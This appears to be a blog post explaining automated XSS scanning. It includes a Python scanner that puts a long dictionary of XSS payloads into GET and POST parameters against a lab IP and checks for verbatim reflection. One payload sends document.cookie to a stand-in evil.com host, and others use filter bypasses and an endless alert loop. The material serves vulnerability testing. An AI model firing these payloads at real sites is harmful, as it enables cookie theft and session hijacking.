On automated blind XSS testing

0x01 Why

If you interview for a security development position, you will without fail be asked about the usual vulnerability-detection techniques, and XSS counts as one of those categories; it is always asked about. Every time someone asks me this question I have to explain it again one on one. I happened to want to summarise my own work, so I am pulling this part out to share.

0x02 Technique

I will not go into the types of XSS here; the focus is on the automated-testing side.

  • v1.0: the traditional test is simple: plain HTTP request testing. Request the URL directly; for POST, splice the payload into the parameters, build the request and send it, and that is it. Nothing more to say about this version; basically everyone knows it.
  • v2.0 is aimed at AJAX-driven pages: wait until the page has fully loaded, then simulate user operations. This one is more interesting; on wooyun people often asked how AJAX should be handled. In an interview at 360, the person in charge at the time suggested driving WebKit, but in my tests it had a certain probability of hanging, so I dropped that by default. The approach I chose instead is browser-less. It works relatively well: I put one instance on a CentOS server and tested my own services indiscriminately, and the results were quite satisfactory. (I am sharing one sample piece of code; adapt it to your needs and fold it into your own scanner.)
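The v1.0 check described above is a reflection test: put a payload into each parameter and look for it verbatim in the response. The following added example (not code from the post) runs that check offline against two constructed page handlers, one that echoes the parameter raw and one that HTML-encodes it, and separates a verbatim reflection from a reflection that output encoding has neutralised; the URL, handler functions and payload subset are constructed for the example.

```python
import html
import random
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Per-run marker, as in the post's script: a hit is tied to this probe and not
# to some alert('XSS') text the page may already contain.
MARKER = str(random.randint(300, 182222))
PAYLOADS = [  # a subset of the post's rule set, with the marker embedded
    "<script>alert(" + MARKER + ");</script>",
    "<img src=foo.png onerror=alert(/" + MARKER + "/) />",
    "\"><script>alert(" + MARKER + ")</script>",
]
URL = "http://target.example/search/search.php?key=dede&lang=cn"  # constructed

def inject_payload(url, param, payload):
    """Rebuild url with `param` set to `payload`, other parameters untouched."""
    parts = urlsplit(url)
    query = dict(parse_qsl(parts.query, keep_blank_values=True))
    query[param] = payload
    return urlunsplit(parts._replace(query=urlencode(query)))

def classify(body, payload):
    """'vulnerable' if the payload is reflected verbatim (the post's find() check),
    'escaped' if only the marker survived (encoding removed the tags), else None."""
    flat = body.replace("\n", "")  # the post joins lines before matching
    if payload in flat:
        return "vulnerable"
    if MARKER in flat:
        return "escaped"
    return None

# Constructed stand-ins for the target server; no network is used.
def vulnerable_search(query):
    # Echoes the parameter into the page without encoding: reflected XSS.
    return "<h1>Results for %s</h1>" % query.get("key", "")

def escaped_search(query):
    # Same page with output encoding: < > & " ' become entities.
    return "<h1>Results for %s</h1>" % html.escape(query.get("key", ""), quote=True)

def scan(handler, url, payloads=PAYLOADS):
    """Put every payload into every query parameter and classify each response."""
    findings = {}
    for name in dict(parse_qsl(urlsplit(url).query, keep_blank_values=True)):
        for payload in payloads:
            target = inject_payload(url, name, payload)
            body = handler(dict(parse_qsl(urlsplit(target).query, keep_blank_values=True)))
            verdict = classify(body, payload)
            if verdict:
                findings.setdefault(name, set()).add(verdict)
    return findings
```

The `lang` parameter is never reflected, so it produces no finding for either handler; only `key` shows up, as `vulnerable` for the raw echo and as `escaped` for the encoded one.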

0x03 Coding


import copy
import random
import urllib.parse

import requests

# Per-run random marker embedded in most payloads, so that a hit in a response
# can be attributed to this probe rather than to text already on the page.
_random = str(random.randint(300, 182222))

# XSS rules: payloads grouped by the tag or feature they rely on.
XSS_Rule = {
    "script": [
            "<script>alert("+_random+");</script>",
            "<script>alert('XSS');</script>",
            "<script>location.href=\"http://www.evil.com/cookie.php?cookie=\"+escape(document.cookie)</script>",
            "<scr<script>ipt>alert("+_random+");</scr</script>ipt>",
            "<script>alert(String.fromCharCode(88,83,83))</script>",
            "\"><script>alert("+_random+")</script>",
            "</title><script>alert(/"+_random+"/)</script>",
            "</textarea><script>alert(/"+_random+"/)</script>",
            "<? echo('<scr');echo('ipt>alert(\""+_random+"\")</script');?>",
            "<marquee><script>alert('"+_random+"')</script></marquee>",
            "<script language=\"JavaScript\">alert('"+_random+"')</script>",
            "\"><script alert(String.fromCharCode(88,83,83))</script>",
            "\'\">><script>alert('"+_random+"')</script>",
            "<script>var var="+_random+";alert(var)</script>",
            "<?='<SCRIPT>alert(\""+_random+"\")</SCRIPT>'?>",
            "<scrscriptipt>alert("+_random+")</scrscriptipt>",
            "</script><script>alert("+_random+")</script>",
            "'\"></title><script>alert("+_random+")</script>",
            "</textarea>\'\"><script>alert(document.cookie)</script>",
            "'\"\"><script language=\"JavaScript\">alert('XS');</script>",
            "</script></script><<<<script><>>>><<<script>alert("+_random+")</script>",
            "<html><noalert><noscript>alert("+_random+")</script>",
            "}</style><script>a=eval;a=eval;b=alert;a(b(/"+_random+"/.source));</script>",
            "<SCRIPT>document.write(\""+_random+"\");</SCRIPT>",
            "='><script>alert(\""+_random+"\")</script>",
            "<body background=javascript:'\"><script>alert(navigator.userAgent)</script></body>",
            ">\"><script>alert(/"+_random+"/)</script>",
            "\"></title><script>alert("+_random+")</script>",
            "</div><script>alert("+_random+")</script>",
            "\"></iframe><script>alert("+_random+")</script>",
            "'></select><script>alert("+_random+")</script>",
    ],
    "img":
    [
            "<img src=foo.png onerror=alert(/"+_random+"/) />",
            "<IMG SRC=\"jav&#x09;ascript:alert('"+_random+"');\">",
            "<IMG SRC=\"jav&#x0A;ascript:alert('"+_random+"');\">",
            "<IMG SRC=\"jav&#x0D;ascript:alert('"+_random+"');\">",
            "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
            "<IMG LOWSRC=\"javascript:alert('"+_random+"')\">",
            "<IMG DYNSRC=\"javascript:alert('"+_random+"')\">",
            "<img src=\"javascript:alert('"+_random+"')\">",
            "<IMG SRC='vbscript:msgbox(\""+_random+"\")'>",
            "\"<marquee><img src=k.png onerror=alert(/"+_random+"/) />",
            "\"<marquee><img src=k onerror=alert(/"+_random+"/) />",
            "'\"><marquee><img src=k.png onerror=alert(/"+_random+"/.source) />",
            "<img src=\"javascript:alert(\""+_random+"\")\">",
            ">\"><img src=\"javascript:alert('"+_random+"')\">",
            "\"/></a></><img src=1.gif onerror=alert("+_random+")>",
            "window.alert(\""+_random+"\");",
    ],
    "iframe":
    [
        "<iframe<?php echo chr(11)?>onload=alert('"+_random+"')></iframe>",
        "\"><iframe src='javascript:alert(document.cookie)'></iframe>",
    ],
    "marquee":
    [
        "'>><marquee><h1>"+_random+"</h1></marquee>",
        "\'\">><marquee><h1>"+_random+"</h1></marquee>",
    ],
    "attr-style":
    [
        "<font style='color:expression(alert(document.cookie))'>",
        "<div style=\"x:expression((windows.r==1)?\":eval('r=1;alert(String.fromCharCode(88,83,83));'))\">",
        "<div style=\"background:url('javascript:alert("+_random+")')\">",
        "\" style=\"background:url(javascript:alert(/"+_random+"/))\"",
        "</br style=a:expression(alert())>",
    ],
    "event":
    [
        "<body onunload=\"javascript:alert('"+_random+"');\">",
        "<body onLoad=\"alert('"+_random+"');\">",
        "\" onfous=alert(document.domain)\"><\"",
        "\"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\""+_random+"\")>",
        "<body onLoad=\"while(true) alert('"+_random+"');\">",
        "<SELECT NAME=\"\" onmouseover=alert("+_random+")></select>",
        "'\"></title><font color=red onmouseover=javascript:alert(1337)>"+_random+"</font>",
    ],
    "meta":
    [
        "<META HTTP-EQUIV='refresh' CONTENT='0;url=javascript:alert(/"+_random+"/');\">",
        "<META HTTP-EQUIV='refresh' CONTENT='0;URL=http://;URL=javascript:alert(/"+_random+"/);'>",
    ],
    "base":
    [
        "<BASE HREF=\"javascript:alert('"+_random+"');//\">",
    ],
    "frameset":
    [
        "<FRAMESET><FRAME SRC=\"javascript:alert('"+_random+"');\"></FRAMESET>",
    ],
    "other":
    [
        "[url=javascript:alert('"+_random+"');]click me[/url]",
        "[color=red' onmouseover=\"alert('"+_random+"')\"]mouse over[/color]",
        "[color=red width=expression(alert("+_random+"))][color]",
    ]
}

# URL construction (GET): for every URL, every rule and every query parameter,
# replace that one parameter with the payload and record the probe to send.
def _init_get_url(url_group, rules, check_group):
    for _url_item in url_group:
        url_node = urllib.parse.urlparse(_url_item)
        uquery = url_node.query
        url_parse = _url_item.replace('?' + uquery, '')
        query_dict = dict(urllib.parse.parse_qsl(uquery))

        for rule_item in rules.keys():
            for _rule in rules[rule_item]:
                for parameter_item in query_dict.keys():
                    tmp_dict = copy.deepcopy(query_dict)
                    tmp_dict[parameter_item] = _rule
                    # Keep the payload literal in the URL; only spaces are encoded as %20.
                    tmp_qs = urllib.parse.unquote(urllib.parse.urlencode(tmp_dict)).replace('+', '%20')
                    check_group.append({'action': url_parse + "?" + tmp_qs, 'input': None,
                                        'method': 'get', 'regex': _rule})

# Request construction (POST): for every form and every rule, put the payload
# into all of the form's input fields at once, one probe per payload.
def _init_from_url(url_dict, rules, check_group):
    # Walk every form
    for url_dict_item in url_dict:
        # Walk every rule group
        for rule_group in rules.keys():
            for rule_item in rules[rule_group]:
                input_dict = {input_item: rule_item for input_item in url_dict_item['input']}
                check_group.append({'action': url_dict_item['action'], 'input': input_dict,
                                    'method': url_dict_item['method'], 'regex': rule_item})

# Send the probe directly and report whether the payload comes back verbatim.
def request_do(url, _data, _regex):
    TIMEOUT = 5
    try:
        if _data is not None:
            req = requests.post(url, data=_data, timeout=TIMEOUT)
        else:
            req = requests.get(url, timeout=TIMEOUT)
    except Exception:
        # Network errors and timeouts count as "not found".
        return False
    # Join lines so that a payload reflected across a line break is still matched.
    req_result = ''.join(req.text.split('\n'))
    return req_result.find(_regex) != -1

# Run the rules
def xss_check(check_group):
    for target in check_group:
        if target['method'].lower() == 'get':
            if request_do(target['action'], None, target['regex']):
                print("[*][GET] Find XSS: %s" % target['action'])
        elif target['method'].lower() == 'post':
            if request_do(target['action'], target['input'], target['regex']):
                print("[*][POST] Find XSS: %s,Parameter: (%s)" % (target['action'], str(target['input'])))

# Assemble the probes and run them
def opurl():
    check_group = []
    _init_get_url(['http://10.211.55.7/search/search.php?lang=cn'], XSS_Rule, check_group)
    _init_from_url([{'action': 'http://10.211.55.7/b.php', 'input': ['bfname', 'blname'], 'method': 'post'}],
                   XSS_Rule, check_group)
    xss_check(check_group)


if __name__ == '__main__':
    opurl()
    # run("http://10.211.55.7/b.php",['bfname','blname'])
    # run("http://10.211.55.7/search/search.php?key=dede&x=24&y=11&lang=cn")